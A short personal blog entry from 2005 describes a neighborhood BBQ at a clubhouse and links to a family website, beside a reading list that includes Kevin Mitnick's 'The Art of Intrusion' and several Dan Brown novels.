The Art of Intrusion - Kevin Mitnick

Looking forward to reading:
The Broker - John Grisham
Angels & Demons - Dan Brown
Deception Point - Dan Brown
Digital Fortress - Dan Brown
Split Second - David Baldacci

BBQ at the ClubHouse

2005-05-15T21:31:00.000-04:00

We had a BBQ at the ClubHouse in our neighborhood Capri, today. It was a lot of fun. I spent most of the time cooking hamburgers and hot dogs in between making sure everyone was having a good time. Check out our website at HankandSarah.com for more information.